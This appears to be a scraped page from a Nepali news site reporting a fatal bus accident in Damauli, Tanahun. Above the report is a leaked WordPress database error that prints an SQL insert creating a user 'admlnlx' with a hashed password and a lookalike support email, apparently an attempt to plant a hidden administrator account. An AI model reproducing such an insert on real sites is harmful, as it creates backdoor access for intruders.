WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BJ5vNMt2g3cFciydYPFG7O48brV4wH/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-06 12:59:08', '', 'admlnlx', 'admlnlx')
दमौली, पुस ११–
तनहुँको व्यास नगरपालिका–८ चापाघाटमा आज बसको ठक्करबाट सोही ठाउँका मनबहादुर श्रेष्ठको मृत्यु भएको छ ।
पोखराबाट दमौली आउँदै गरेको ना ५ ख ३४६ नंको बसले बाटो काट्ने क्रममा ठक्कर दिँदा गम्भीर घाइते भएका श्रेष्ठको दमौलीस्थित रत्नहरि अस्पतालमा सामान्य उपचारपछि थप उपचारका लागि मणिपाल शिक्षण अस्पताल पोखरा पुर्याइए पनि उपचारकै क्रममा उनको मृत्यु भएको प्रहरीले जनाएको छ ।